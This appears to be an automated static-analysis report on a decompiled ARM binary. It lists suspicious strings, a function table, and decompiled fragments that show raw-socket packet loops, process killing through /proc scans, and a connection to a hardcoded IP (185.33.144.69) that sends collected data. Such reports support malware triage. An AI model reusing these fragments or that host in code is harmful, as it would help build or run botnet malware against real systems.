=============================================================================
========	BINARY ID :d7ec9c70769fb47bbe2d5740ea5bd6d4c3ecd016==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :147
SUPSCPECTED LINES COUNT :9
SUPSCPECTED STRINGS COUNT (DISTINCT) :8
SUPSCPECTED STRINGS WEIGHT :30
SUSPECT STRING SCORE : [30 / 150] 20%
USER AGENTS STRINGS COUNT :0
STATIC IPs STRINGS COUNT :1
DYNAMIC IPs STRINGS COUNT :0
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
connect
getpid
socket
kill
bind
inet_addr
fork
getppid
sigprocmask
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
185.33.144.69
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 36789
+++TOTAL FUNCTIONS 			:113
+++LINES PER FUNCTION RATIO 	: 325.566371681416
+++SUSPECTED LINES COUNT 	: 653
+++SUSPECTED LINES RATIO 	: 1.7749870885319
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 36789
+++WHILE (TRUE) LINES			: 7121
+++WHILE (TRUE) LINES RATION		:19.3563293375737%
+++WHILE (TRUE) LOOPS COUNT		: 82
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
    int32_t v229 = inet_addr("185.33.144.69");

                                                                                                                                    inet_addr("185.33.144.69");

================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_f768                                     |1   |2619    |125           |1993        |
----------------------------------------------------------------------------------------------
function_b65c                                     |4   |947     |51            |434         |
----------------------------------------------------------------------------------------------
function_eb60                                     |2   |631     |42            |269         |
----------------------------------------------------------------------------------------------
function_ded0                                     |1   |885     |38            |515         |
----------------------------------------------------------------------------------------------
function_e46c                                     |1   |628     |33            |356         |
----------------------------------------------------------------------------------------------
function_c688                                     |4   |574     |25            |264         |
----------------------------------------------------------------------------------------------
function_be0c                                     |4   |574     |25            |264         |
----------------------------------------------------------------------------------------------
__data_start                                      |2   |0       |22            |0           |
----------------------------------------------------------------------------------------------
function_96a4                                     |5   |372     |19            |106         |
----------------------------------------------------------------------------------------------
function_998c                                     |5   |372     |19            |106         |
----------------------------------------------------------------------------------------------
function_8fec                                     |4   |646     |14            |231         |
----------------------------------------------------------------------------------------------
function_d678                                     |4   |510     |13            |228         |
----------------------------------------------------------------------------------------------
function_b198                                     |4   |411     |12            |136         |
----------------------------------------------------------------------------------------------
function_cf04                                     |4   |527     |12            |243         |
----------------------------------------------------------------------------------------------
function_9c74                                     |4   |490     |12            |153         |
----------------------------------------------------------------------------------------------
function_aa7c                                     |4   |471     |11            |197         |
----------------------------------------------------------------------------------------------
function_a300                                     |4   |480     |11            |201         |
----------------------------------------------------------------------------------------------
function_1198c                                    |3   |0       |8             |70          |
----------------------------------------------------------------------------------------------
function_117e0                                    |0   |0       |7             |0           |
----------------------------------------------------------------------------------------------
function_f2e4                                     |1   |233     |7             |0           |
----------------------------------------------------------------------------------------------
__modsi3                                          |2   |0       |5             |380         |
----------------------------------------------------------------------------------------------
__udivsi3                                         |2   |0       |5             |212         |
----------------------------------------------------------------------------------------------
function_f4f0                                     |0   |252     |5             |0           |
----------------------------------------------------------------------------------------------
function_11908                                    |3   |0       |5             |40          |
----------------------------------------------------------------------------------------------
function_8efc                                     |6   |290     |5             |13          |
----------------------------------------------------------------------------------------------
function_ea74                                     |1   |263     |5             |5           |
----------------------------------------------------------------------------------------------
__umodsi3                                         |2   |0       |5             |354         |
----------------------------------------------------------------------------------------------
function_9240                                     |5   |274     |4             |16          |
----------------------------------------------------------------------------------------------
function_11654                                    |2   |0       |4             |147         |
----------------------------------------------------------------------------------------------
function_1187c                                    |3   |0       |3             |48          |
----------------------------------------------------------------------------------------------
function_11550                                    |2   |0       |3             |24          |
----------------------------------------------------------------------------------------------
_close                                            |1   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_recvfrom                                         |8   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_connect                                          |4   |232     |2             |0           |
----------------------------------------------------------------------------------------------
function_ea20                                     |0   |241     |2             |0           |
----------------------------------------------------------------------------------------------
_getpid                                           |0   |232     |2             |0           |
----------------------------------------------------------------------------------------------
function_92ac                                     |4   |274     |2             |16          |
----------------------------------------------------------------------------------------------
_getppid                                          |0   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_inet_addr                                        |1   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_fork                                             |0   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_open                                             |3   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_socket                                           |3   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_recv                                             |4   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_sigprocmask                                      |5   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_setsockopt                                       |5   |232     |2             |0           |
----------------------------------------------------------------------------------------------
function_11780                                    |3   |0       |2             |24          |
----------------------------------------------------------------------------------------------
function_f40c                                     |1   |277     |2             |41          |
----------------------------------------------------------------------------------------------
_kill                                             |2   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_getsockname                                      |4   |232     |2             |0           |
----------------------------------------------------------------------------------------------
function_8e98                                     |4   |264     |2             |15          |
----------------------------------------------------------------------------------------------
_closedir                                         |2   |232     |2             |0           |
----------------------------------------------------------------------------------------------
function_115ec                                    |4   |0       |2             |20          |
----------------------------------------------------------------------------------------------
_getsockopt                                       |6   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_send                                             |4   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_sendto                                           |7   |232     |2             |0           |
----------------------------------------------------------------------------------------------
_select                                           |9   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_8e54                                     |0   |233     |1             |0           |
----------------------------------------------------------------------------------------------
function_8b1c                                     |0   |240     |1             |0           |
----------------------------------------------------------------------------------------------
_readlink                                         |4   |232     |1             |0           |
----------------------------------------------------------------------------------------------
_sleep                                            |1   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_10ea4                                    |1   |272     |1             |0           |
----------------------------------------------------------------------------------------------
_setsid                                           |0   |232     |1             |0           |
----------------------------------------------------------------------------------------------
_sigaddset                                        |3   |232     |1             |0           |
----------------------------------------------------------------------------------------------
*                                                 |0   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_f340                                     |2   |252     |1             |0           |
----------------------------------------------------------------------------------------------
_prctl                                            |5   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_8dfc                                     |0   |237     |1             |0           |
----------------------------------------------------------------------------------------------
_fcntl                                            |2   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_11da4                                    |0   |0       |1             |0           |
----------------------------------------------------------------------------------------------
_clock                                            |0   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_10f5c                                    |1   |272     |1             |0           |
----------------------------------------------------------------------------------------------
_bind                                             |4   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_8d7c                                     |0   |264     |1             |0           |
----------------------------------------------------------------------------------------------
__start                                           |2   |236     |1             |0           |
----------------------------------------------------------------------------------------------
function_ea08                                     |2   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_10e78                                    |2   |243     |1             |0           |
----------------------------------------------------------------------------------------------
function_11d68                                    |1   |0       |1             |0           |
----------------------------------------------------------------------------------------------
function_931c                                     |1   |277     |1             |0           |
----------------------------------------------------------------------------------------------
_time                                             |1   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_8df0                                     |2   |238     |1             |0           |
----------------------------------------------------------------------------------------------
___uClibc_main                                    |7   |232     |1             |0           |
----------------------------------------------------------------------------------------------
_read                                             |3   |232     |1             |0           |
----------------------------------------------------------------------------------------------
_ioctl                                            |2   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_11528                                    |1   |0       |1             |0           |
----------------------------------------------------------------------------------------------
_write                                            |3   |232     |1             |0           |
----------------------------------------------------------------------------------------------
_sigemptyset                                      |2   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_ddc4                                     |2   |271     |1             |0           |
----------------------------------------------------------------------------------------------
function_f5c4                                     |3   |285     |1             |0           |
----------------------------------------------------------------------------------------------
function_11014                                    |4   |0       |1             |0           |
----------------------------------------------------------------------------------------------
function_11d9c                                    |0   |0       |1             |0           |
----------------------------------------------------------------------------------------------
_unlink                                           |1   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_f28c                                     |0   |238     |1             |0           |
----------------------------------------------------------------------------------------------
function_8b04                                     |0   |233     |1             |0           |
----------------------------------------------------------------------------------------------
__aeabi_uidivmod                                  |2   |0       |1             |0           |
----------------------------------------------------------------------------------------------
function_115a4                                    |3   |0       |1             |0           |
----------------------------------------------------------------------------------------------
_atoi                                             |1   |232     |1             |0           |
----------------------------------------------------------------------------------------------
function_de20                                     |4   |302     |1             |0           |
----------------------------------------------------------------------------------------------
function_115c8                                    |0   |0       |1             |0           |
----------------------------------------------------------------------------------------------
__aeabi_ldiv0                                     |0   |0       |1             |0           |
----------------------------------------------------------------------------------------------
_free                                             |1   |0       |0             |0           |
----------------------------------------------------------------------------------------------
sig,                                              |1   |0       |0             |0           |
----------------------------------------------------------------------------------------------
_memcpy                                           |4   |0       |0             |0           |
----------------------------------------------------------------------------------------------
_exit                                             |1   |0       |0             |0           |
----------------------------------------------------------------------------------------------
_strcpy                                           |3   |0       |0             |0           |
----------------------------------------------------------------------------------------------
_abort                                            |0   |0       |0             |0           |
----------------------------------------------------------------------------------------------
dirent                                            |3   |0       |0             |0           |
----------------------------------------------------------------------------------------------
_memmove                                          |4   |0       |0             |0           |
----------------------------------------------------------------------------------------------
___errno_location                                 |0   |0       |0             |0           |
----------------------------------------------------------------------------------------------
_malloc                                           |1   |0       |0             |0           |
----------------------------------------------------------------------------------------------
__dirstream                                       |2   |0       |0             |0           |
----------------------------------------------------------------------------------------------
_memset                                           |3   |0       |0             |0           |
----------------------------------------------------------------------------------------------
_realloc                                          |2   |0       |0             |0           |
----------------------------------------------------------------------------------------------
_calloc                                           |2   |0       |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_f768 ===================
++++++++ FUNCTION START 26232
++++++++ FUNCTION END 28851
++++++++ FUNCTION LENGTH 2619
    struct sockaddr * v98;
    int32_t result = fork(); // 0xf774
    int32_t sock;
    while (true) {
            int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); // 0xf834
            sock = sock_fd;
            if (sock_fd == -1) {
            fcntl(sock_fd, F_GETFL);
            fcntl(sock_fd, F_SETFL);
            if (setsockopt(sock, status, 3, &status, 4) != 0) {
                close(sock);
            while (true) {
                    while (true) {
                        while (true) {
                while (true) {
                    uint32_t v238 = recvfrom(sock, &buf, 1514, MSG_NOSIGNAL, NULL, NULL); // 0xfdf8
                        while (true) {
                                close(fd);
                        while (true) {
                            int32_t sock18; // 0x10238
                            if (sock18 != -1) {
                                if ((v263 >> sock18 % 32) % 2 == 0) {
                                    v261 = sock18;
                                            while (true) {
                                                while (true) {
                                                    int32_t sock2; // 0x10400
                                                    int32_t v273 = recv(sock2, (int32_t *)buf2, 256 - v272, MSG_NOSIGNAL); // 0x10410
                                                                    close(fd2);
                                                                while (true) {
                                                                        case 2: {
                                                                                while (true) {
                                                                                    while (true) {
                                                                                                                int32_t sock3; // 0x10d2c
                                                                                                                send(sock3, &buf3, 3, MSG_NOSIGNAL);
                                                                                                                            send(0x4000, (int32_t *)status, 3, MSG_NOSIGNAL);
                                                                                                            send(0x4000, (int32_t *)(int32_t)&buf4, 9, MSG_NOSIGNAL);
                                                                                                            while (true) {
                                                                                                                    case 2: {
                                                                                                                            while (true) {
                                                                                                                    case 3: {
                                                                                                                            while (true) {
                                                                                                                                    int32_t sock4; // 0x105e0
                                                                                                                                    send(sock4, (int32_t *)buf5, (int32_t)length, MSG_NOSIGNAL);
                                                                                                                                    int32_t sock5; // 0x105f8
                                                                                                                                    send(sock5, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
                                                                                                                    case 4: {
                                                                                                                            while (true) {
                                                                                                                                    int32_t sock6; // 0x10678
                                                                                                                                    send(sock6, (int32_t *)buf6, (int32_t)length2, MSG_NOSIGNAL);
                                                                                                                                    int32_t sock7; // 0x10690
                                                                                                                                    send(sock7, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
                                                                                                                    case 5: {
                                                                                                                            while (true) {
                                                                                                                                    int32_t sock8; // 0x10730
                                                                                                                                    send(sock8, (int32_t *)buf7, length3, MSG_NOSIGNAL);
                                                                                                                                    int32_t sock9; // 0x10744
                                                                                                                                    send(sock9, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
                                                                                                                                while (true) {
                                                                                                                        while (true) {
                                                                                                                    case 6: {
                                                                                                                        while (true) {
                                                                                                                            int32_t sock10; // 0x10858
                                                                                                                            send(sock10, (int32_t *)buf8, length4, MSG_NOSIGNAL);
                                                                                                                            int32_t sock11; // 0x1086c
                                                                                                                            send(sock11, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
                                                                                                                    case 7: {
                                                                                                                        while (true) {
                                                                                                                            int32_t sock12; // 0x10b1c
                                                                                                                            send(sock12, (int32_t *)buf9, length4, MSG_NOSIGNAL);
                                                                                                                            int32_t sock13; // 0x10b30
                                                                                                                            send(sock13, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
                                                                                                                    case 8: {
                                                                                                                        while (true) {
                                                                                                                            int32_t sock14; // 0x109b4
                                                                                                                            send(sock14, (int32_t *)buf10, length3, MSG_NOSIGNAL);
                                                                                                                            int32_t sock15; // 0x109c8
                                                                                                                            send(sock15, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
                                                                                                                    case 9: {
                                                                                                                        while (true) {
                                                                                                                            int32_t sock16; // 0x10a68
                                                                                                                            send(sock16, (int32_t *)buf11, length3, MSG_NOSIGNAL);
                                                                                                                            int32_t sock17; // 0x10a7c
                                                                                                                            send(sock17, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
                                                                                                                    case 10: {
                                                                                                                            int32_t v417 = fork(); // 0x10c84
                                                                                                                                    int32_t sock_fd2 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0x10df4
                                                                                                                                    t = sock_fd2;
                                                                                                                                    if (sock_fd2 == -1) {
                                                                                                                                    inet_addr("185.33.144.69");
                                                                                                                                    if (connect(t, (struct sockaddr *)&addr, 16) == -1) {
                                                                                                                                        close(t);
                                                                                                                                    send(t, &length3, 1, MSG_NOSIGNAL);
                                                                                                                                    send(t, &length4, 4, MSG_NOSIGNAL);
                                                                                                                                    send(t, &buf12, length5, MSG_NOSIGNAL);
                                                                                                                                    send(t, (int32_t *)(v314 + 12), 1, MSG_NOSIGNAL);
                                                                                                                                    send(t, (int32_t *)buf13, (int32_t)length6, MSG_NOSIGNAL);
                                                                                                                                    send(t, (int32_t *)(v314 + 13), 1, MSG_NOSIGNAL);
                                                                                                                                    send(t, (int32_t *)buf14, (int32_t)length7, MSG_NOSIGNAL);
                                                                                                                                    close(t);
                                                                                                                            close(fd3);
                                                                                                                            close(fd4);
                                                                                    while (true) {
                                                                        case 3: {
                                                                        case 4: {
                                                                        case 5: {
                                                                        case 6: {
                                                                        case 7: {
                                                                        case 8: {
                                                                        case 9: {
                                                                        case 10: {
                                                        close(fd2);
                                                        while (true) {
                                    if ((length4 | getsockopt(sock18, SO_DEBUG, 4, &length4, &length3)) == 0) {
                                            while (true) {
                                        close(fd5);
                        while (true) {
                    while (true) {
                while (true) {
            while (true) {
        while (true) {
    while (true) {
                    sendto(sock, &message, 40, MSG_NOSIGNAL, (struct sockaddr *)&addr, 16);
                    while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_b65c ===================
++++++++ FUNCTION START 18053
++++++++ FUNCTION END 19000
++++++++ FUNCTION LENGTH 947
    struct sockaddr * v117;
    fd = open((char *)function_10e78(21, NULL), O_RDONLY);
    int32_t sock_fd; // 0xb8dc
        close(fd);
                while (true) {
                                        result = inet_addr((char *)&cp);
                                        sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
                                        if (sock_fd == -1) {
                                        if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
                                            result2 = close(sock_fd);
                                            while (true) {
                                                    while (true) {
                                            while (true) {
                                            while (true) {
                                                                sendto(sock_fd, (int32_t *)fd, v241 + 47, MSG_NOSIGNAL, (struct sockaddr *)dest_addr, 16);
                                    result = inet_addr((char *)&cp);
                                    sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
                                    if (sock_fd == -1) {
                                    if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
                                        result2 = close(sock_fd);
                                        while (true) {
                    case 0: {
                    case 1: {
                    case -2: {
                    case -1: {
                sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
                if (sock_fd == -1) {
                if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
                    result2 = close(sock_fd);
                    while (true) {
                while (true) {
            case 0: {
            case 1: {
            case -2: {
            case -1: {
        sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
        if (sock_fd == -1) {
        if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
            result2 = close(sock_fd);
            while (true) {
        while (true) {
        case 0: {
        case 1: {
        case -2: {
        case -1: {
    sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
    if (sock_fd == -1) {
    if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
        result2 = close(sock_fd);
        while (true) {
    while (true) {
=================FUNCTION : function_eb60 ===================
++++++++ FUNCTION START 24043
++++++++ FUNCTION END 24674
++++++++ FUNCTION LENGTH 631
    sigprocmask(how, (struct _TYPEDEF_sigset_t *)&set, (struct _TYPEDEF_sigset_t *)how);
    struct sockaddr * addr;
        if (fork() > fd2) {
        close(fd2);
        close(1);
        v234 = close(2);
        while (true) {
                while (true) {
                    while (true) {
                    int32_t sock;
                    if (sock == -1) {
                        int32_t sock_fd = socket(AF_INET, SOCK_STREAM, protocol); // 0xf06c
                        int32_t fd3 = sock_fd; // r5
                        if (sock_fd != -1) {
                            fcntl(sock_fd, F_GETFL);
                            connect(sock, (struct sockaddr *)&addr, 16);
                    uint32_t v263 = sock; // 0xef44
                    int32_t v267 = sock; // 0xee70
                                send(sock, (int32_t *)&buf2, 2, MSG_NOSIGNAL);
                        uint32_t sock2 = sock; // 0xef70
                            if (sock2 != -1) {
                                if ((v275 >> sock2 % 32) % 2 != 0) {
                                    int32_t v276 = recv(sock, (int32_t *)&buf2, 2, MSG_PEEK | MSG_NOSIGNAL); // 0xefd0
                                                __pseudo_cond_branch(sock != -1, (int32_t)&v274);
                                                sock = -1;
                                            recv(sock, (int32_t *)&buf2, 2, MSG_NOSIGNAL);
                                                close(sock);
                                                int32_t v280 = recv(sock, &buf3, length, MSG_PEEK | MSG_NOSIGNAL); // 0xf028
                                                recv(sock, (int32_t *)&buf2, 2, MSG_NOSIGNAL);
                                                recv(sock, &buf3, length2, MSG_NOSIGNAL);
                            if ((v285 >> sock2 % 32) % 2 == 0) {
                                __pseudo_cond_branch(sock2 != -1, (int32_t)&v274);
                                getsockopt(sock2, SO_DEBUG, 4, &option_value, &option_len);
                                    send(sock, &buf4, 4, MSG_NOSIGNAL);
                                    send(sock, (int32_t *)&buf2, 1, MSG_NOSIGNAL);
                                    send(sock, &buf5, length3, MSG_NOSIGNAL);
                                    close(sock);
    if (fork() > fd2) {
    close(fd2);
    close(1);
    v234 = close(2);
    while (true) {
=================FUNCTION : function_ded0 ===================
++++++++ FUNCTION START 21779
++++++++ FUNCTION END 22664
++++++++ FUNCTION LENGTH 885
    struct sockaddr * v116;
    int32_t fd = open((char *)function_10e78(17, (int32_t *)oflag), oflag); // 0xdfb0
    struct __dirstream * dirp; // 0xe188
        close(fd2);
            dirp = opendir((char *)name);
                    while (true) {
                closedir((struct __dirstream *)fd2);
    while (true) {
                while (true) {
                            while (true) {
                                while (true) {
                                                    while (true) {
                                                close(fd2);
                                                dirp = opendir((char *)name);
                                                    while (true) {
                                                        while (true) {
                                                                        struct __dirstream * dirp2 = opendir((char *)&path); // 0xe284
                                                                                while (true) {
                                                                                    while (true) {
                                                                                                    kill(function_11654((char *)v272, 10), SIGKILL);
                                                                                                    struct dirent * v290 = readdir((struct __dirstream *)dirp3); // 0xe380
                                                                                            struct dirent * v291 = readdir((struct __dirstream *)dirp3); // 0xe294
                                                                                    closedir((struct __dirstream *)dirp3);
                                                                                    v281 = readdir((struct __dirstream *)fd2);
                                                                                closedir((struct __dirstream *)dirp4);
                                                                            closedir((struct __dirstream *)dirp3);
                                                                            v281 = readdir((struct __dirstream *)fd2);
                                                                struct dirent * v301 = readdir((struct __dirstream *)fd2); // 0xe1a0
                                                        closedir((struct __dirstream *)fd2);
                                                closedir((struct __dirstream *)fd2);
                                close(fd2);
                                dirp = opendir((char *)name);
                                    while (true) {
                                closedir((struct __dirstream *)fd2);
    close(fd2);
        dirp = opendir((char *)name);
                while (true) {
            closedir((struct __dirstream *)fd2);
=================FUNCTION : function_e46c ===================
++++++++ FUNCTION START 22667
++++++++ FUNCTION END 23295
++++++++ FUNCTION LENGTH 628
    struct sockaddr * v115;
    int32_t result = fork(); // 0xe484
    int32_t pid = getpid(); // 0xe52c
    int32_t fd = open((char *)path, oflag); // 0xe574
        close(fd);
        while (true) {
            struct __dirstream * v236 = opendir((char *)function_10e78(13, NULL)); // 0xe5f8
                struct dirent * v237 = readdir((struct __dirstream *)dirp); // 0xe63446
                    while (true) {
                        while (true) {
                                        int32_t fd2 = open((char *)&path2, O_RDONLY); // 0xe880
                                                while (true) {
                                                        while (true) {
                                                                    close(fd4);
                                                                    kill(time_val, SIGKILL);
                                                                    v240 = readdir((struct __dirstream *)dirp);
                                                                while (true) {
                                                close(fd4);
                                            close(fd4);
                                            kill(time_val, SIGKILL);
                                        int32_t pid2 = getpid(); // 0xe818
                                            int32_t ppid = getppid(); // 0xe824
                                                    int32_t fd3 = open((char *)path, O_RDONLY); // 0xe85c
                                                        kill(time_val, SIGKILL);
                                                    close(fd5);
                                                v240 = readdir((struct __dirstream *)dirp);
                                    v240 = readdir((struct __dirstream *)dirp);
                                        struct dirent * v275 = readdir((struct __dirstream *)dirp); // 0xe6ac
                                    v240 = readdir((struct __dirstream *)dirp2);
                                v240 = readdir((struct __dirstream *)dirp2);
                            v240 = readdir((struct __dirstream *)dirp);
                        closedir((struct __dirstream *)dirp);
                closedir((struct __dirstream *)dirp);
=================FUNCTION : function_c688 ===================
++++++++ FUNCTION START 19580
++++++++ FUNCTION END 20154
++++++++ FUNCTION LENGTH 574
    struct sockaddr * v117;
    int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); // 0xc858
    if (sock_fd == -1) {
    if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
        result = close(sock_fd);
            while (true) {
                int32_t sock_fd2 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0xc8ec107
                fd = sock_fd2;
                if (sock_fd2 != -1) {
                    while (true) {
                        fcntl(sock_fd2, F_GETFL);
                        connect(fd, (struct sockaddr *)&addr, 16);
                        while (true) {
                            int32_t v259 = recvfrom(sock_fd, &buf, 256, MSG_NOSIGNAL, (struct sockaddr *)&addr2, &addr_len); // 0xca54
                                                close(fd);
                        close(fd);
                        int32_t sock_fd3 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0xc8ec
                        fd = sock_fd3;
                        if (sock_fd3 == -1) {
                        sock_fd2 = sock_fd3;
            while (true) {
                while (true) {
                    sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(24 * option_value + a2), 16);
                sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(24 * option_value + a2), 16);
        while (true) {
=================FUNCTION : function_be0c ===================
++++++++ FUNCTION START 19003
++++++++ FUNCTION END 19577
++++++++ FUNCTION LENGTH 574
    struct sockaddr * v117;
    int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); // 0xbfdc
    if (sock_fd == -1) {
    if (setsockopt(sock_fd, 0, 3, &option_value, 4) == -1) {
        result = close(sock_fd);
            while (true) {
                int32_t sock_fd2 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0xc070107
                fd = sock_fd2;
                if (sock_fd2 != -1) {
                    while (true) {
                        fcntl(sock_fd2, F_GETFL);
                        connect(fd, (struct sockaddr *)&addr, 16);
                        while (true) {
                            int32_t v259 = recvfrom(sock_fd, &buf, 256, MSG_NOSIGNAL, (struct sockaddr *)&addr2, &addr_len); // 0xc1d8
                                                close(fd);
                        close(fd);
                        int32_t sock_fd3 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0xc070
                        fd = sock_fd3;
                        if (sock_fd3 == -1) {
                        sock_fd2 = sock_fd3;
            while (true) {
                while (true) {
                    sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(24 * option_value + a2), 16);
                sendto(sock_fd, (int32_t *)message, length, MSG_NOSIGNAL, (struct sockaddr *)(24 * option_value + a2), 16);
        while (true) {
=================FUNCTION : __data_start ===================
++++++++ FUNCTION START 36493
++++++++ FUNCTION END 
++++++++ FUNCTION LENGTH 
    struct sockaddr * v117;
// int bind(int fd, __CONST_SOCKADDR_ARG addr, socklen_t len);
// int close(int fd);
// int closedir(DIR * dirp);
// int connect(int fd, __CONST_SOCKADDR_ARG addr, socklen_t len);
// __pid_t fork(void);
// void free(void * ptr);
// __pid_t getpid(void);
// __pid_t getppid(void);
// int getsockname(int fd, __SOCKADDR_ARG addr, socklen_t * restrict len);
// int getsockopt(int fd, int level, int optname, void * restrict optval, socklen_t * restrict optlen);
// in_addr_t inet_addr(const char * cp);
// int kill(__pid_t pid, int sig);
// int open(const char * file, int oflag, ...);
// DIR * opendir(const char * name);
// ssize_t recv(int fd, void * buf, size_t n, int flags);
// ssize_t recvfrom(int fd, void * restrict buf, size_t n, int flags, __SOCKADDR_ARG addr, socklen_t * restrict addr_len);
// ssize_t send(int fd, const void * buf, size_t n, int flags);
// ssize_t sendto(int fd, const void * buf, size_t n, int flags, __CONST_SOCKADDR_ARG addr, socklen_t addr_len);
// int setsockopt(int fd, int level, int optname, const void * optval, socklen_t optlen);
// int sigprocmask(int how, const sigset_t * restrict set, sigset_t * restrict oset);
// int socket(int domain, int type, int protocol);
=================FUNCTION : function_96a4 ===================
++++++++ FUNCTION START 15439
++++++++ FUNCTION END 15811
++++++++ FUNCTION LENGTH 372
    struct sockaddr * v117;
        while (true) {
            int32_t sock_fd = socket(AF_INET, 17, IPPROTO_UDP); // 0x97f4
            if (sock_fd == -1) {
            bind(sock_fd, (struct sockaddr *)&addr, 16);
            int32_t sock; // 0x9898
            connect(sock, (struct sockaddr *)addr2, 16);
            while (true) {
                while (true) {
                        int32_t sock2; // 0x9910
                        send(sock2, (int32_t *)buf, length, MSG_NOSIGNAL);
                            send(sock2, (int32_t *)buf, length, MSG_NOSIGNAL);
                        int32_t sock3; // 0x9964
                        send(sock3, (int32_t *)buf2, length, MSG_NOSIGNAL);
                            send(sock3, (int32_t *)buf2, length, MSG_NOSIGNAL);
                    while (true) {
                    while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_998c ===================
++++++++ FUNCTION START 15814
++++++++ FUNCTION END 16186
++++++++ FUNCTION LENGTH 372
    struct sockaddr * v117;
        while (true) {
            int32_t sock_fd = socket(AF_INET, 0, IPPROTO_IP); // 0x9adc
            if (sock_fd == -1) {
            bind(sock_fd, (struct sockaddr *)&addr, 16);
            int32_t sock; // 0x9b80
            connect(sock, (struct sockaddr *)addr2, 16);
            while (true) {
                while (true) {
                        int32_t sock2; // 0x9bf8
                        send(sock2, (int32_t *)buf, length, MSG_NOSIGNAL);
                            send(sock2, (int32_t *)buf, length, MSG_NOSIGNAL);
                        int32_t sock3; // 0x9c4c
                        send(sock3, (int32_t *)buf2, length, MSG_NOSIGNAL);
                            send(sock3, (int32_t *)buf2, length, MSG_NOSIGNAL);
                    while (true) {
                    while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_8fec ===================
++++++++ FUNCTION START 13956
++++++++ FUNCTION END 14602
++++++++ FUNCTION LENGTH 646
    struct sockaddr * v117;
        while (true) {
                                        while (true) {
                                                free((int32_t *)v243);
                                            free((int32_t *)v243);
                                free((int32_t *)v243);
                            free((int32_t *)v243);
                    free((int32_t *)v243);
                free((int32_t *)v243);
                            while (true) {
                    free((int32_t *)v243);
                free((int32_t *)v243);
        free((int32_t *)v243);
    free((int32_t *)v243);
=================FUNCTION : function_d678 ===================
++++++++ FUNCTION START 20687
++++++++ FUNCTION END 21197
++++++++ FUNCTION LENGTH 510
    struct sockaddr * v116;
    int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); // 0xd840
